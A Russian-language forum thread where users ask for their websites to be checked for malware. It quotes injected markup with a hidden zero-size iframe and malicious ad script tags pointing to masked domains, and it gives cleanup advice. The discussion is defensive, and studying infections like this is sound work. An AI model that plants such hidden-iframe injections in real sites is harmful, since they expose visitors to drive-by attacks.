Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
.htaccess - нет там ничего

Добавлено через 9 минут 50 секунд
ну и как мне быстро этот файлик вывернуть на изнанку, чтобы что увидеть??

Добавлено через 4 минуты 17 секунд
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
 
Взять файлик исходный до изменений (смотрим в последний файловый бекап или исходные файлы движка) и сравниваем. Если есть изменения, то файл необходимо заменить. Так же необходимо проверить модули (?ID?) на наличие неизвестных врезок. Если считаете это сложным, то лучше обратится сразу к профессионалам, которые досконально знают движок портала для проведения полного аудита.

Когда последний бекап делали?

Добавлено через 1 минуту 44 секунды
pepper65 написал(а):
Чем раскомпилировать??? Чтобы быстро и наверняка, без особых навыков???
Нажмите для раскрытия...
Без навыков никак.
 
И чем увидеть айфрейм, если его нету в коде с главной страницы?

Добавлено через 3 минуты 44 секунды
Ну есть родные файлы - разницы нет, сравнил уже и заменил .htaccess и mouseover.js для верности
 
akoK написал(а):
В коде:
PHP: 
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>

Необходимо проверить содержимое всех файлов с эталоном. А так же необходимо обратится в вирлаб за помощью т.к. заражение довольно сложное для стандартных методов анализа.

http://support.kaspersky.ru/virlab/helpdesk.html

Добавлено через 23 минуты 23 секунды
И особенно присмотритесь:
[[[]]]://istur.ru/templates/younews/src/mouseover.js
Нажмите для раскрытия...

akoK,

Привет! Слушай, но я тоже с этим сайтом и сервером вожусь уже ч\целый день, пробовали и скан делать через SSH и руками всё перевернули, ничего не нашли, кроме двух файлов которые относятся к другим сайтам ( на том же аккаунте ). То что ты скинул кусок кода, я не могу найти тоже самое. Вот то место
<![endif]-->
<script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script>

</head>

<body id="color">


<div id="centertop" style="font-size:11px; width:960px;">
Нажмите для раскрытия...

Это код главной страницы, когда по идеи подгружается всё что есть, и iframe нету.
Короче пока в тупике, ничего не нашли на этом сайте.
 
</script><script type="text/javascript" src="http://istur.ru/templates/younews/src/mouseover.js"></script><style type="text/css">
.button,.validate,
.pollbuttons .button {
padding:0 0 4px 0px;
}
</style></head><body id="color"><iframe src="http://dyna55.***/index.php" height="0" width="0"></iframe>
Нажмите для раскрытия...
просто, как это найдено было и чем?
 
Лисой с отключенными NoScript и Adblock (спользовался как монитор) + просмотр кода. Ифрейм был обнаружен только 1 раз из 10 проверок.
 
И куда прописан был?
 
Здесь /media/system/js/mootools.js

Открывал и смотрел его раз 5 точно, ничего не видел, пока через SSH не дал поиск по примерному слову , которое обычно используется в коде, только тогда нашёл его..

Могу код вирусняка выложить, так как большая часть сервисов проверок на вирусы вообще на него не реагировали, и включая siteguarg . Специально там зарегался, так он этот файл определил в безопасные :) я сегодня скинул им код для базы.
 
Код получил и даже расшифровал. Кстати получил детект эвристика.
 
У меня на сайте не понятно откуда появился вирус, уже 4 дня воюю, пытаюсь найти, но безрезультатно. Сайт на юкозе, фреймовых окон нет,всплывающих банеров тоже. Помогите, сайт очень дорог мне, уже даже не знаю куда еще обращаться.
 
А ссылку увидеть можно неактивную?
 
Очень много рекламы. Какой точно детект дают антивирусы? Нужно больше информации.

1. Уберите рекламу от Tizeroff
В их JS две интересные вставки
PHP: 
<script type="text/javascript" src="http://golddeery.****/show-banner.php?kod=788462&amp;site=site.ru" - на который реагирует эвристика.

src="http://c***gedg.ru/iz.php" height="0" width="0">
 
Сейчас попробую, хотя просматривала неоднократно, и тизероф убирала, все равно выдавало вирус.
 
Тогда скрины в студию реакции антивируса.
 
хттп://forum.cfin.ru
ссылка на retwite.com блокирует eset.
еще разные антивиры ругались, выдавая сообщения, которые содержали в том числе:
1.19.03.2010 15:52:35 хттп://www.cfin.ru/ad/language/english/lang.js Обнаружено: HEUR:Trojan.Script.Iframer
2.URL: over-blog-com.alice.it.baixing-com.superseasilver.ru:8080/google.co.th/google.co.th/google.com/virginmedia.com/keepvid.com.php
Name: Link to known exploit site (type 750
 
micro, смотрю уже удалось удалить вредоносный код. Проверьте модули форума. Обновите форум до последней актуальной версии 3.8.5 + смените пароли администраторов и пароли для доступа к ftp
 

Похожие темы

N
сайт рухнул в поиске, помогите проверить на вредоносное по
Ответы
7
Просмотры
2K
akok
akok
magirus
  • Закрыта
прошу проверить сайт kazus.ru
Ответы
2
Просмотры
3K
magirus
magirus
BLO100
  • Закрыта
Прошу проверить сайт mafcup.ucoz.ru/
Ответы
5
Просмотры
3K
akok
akok
Назад
Сверху Снизу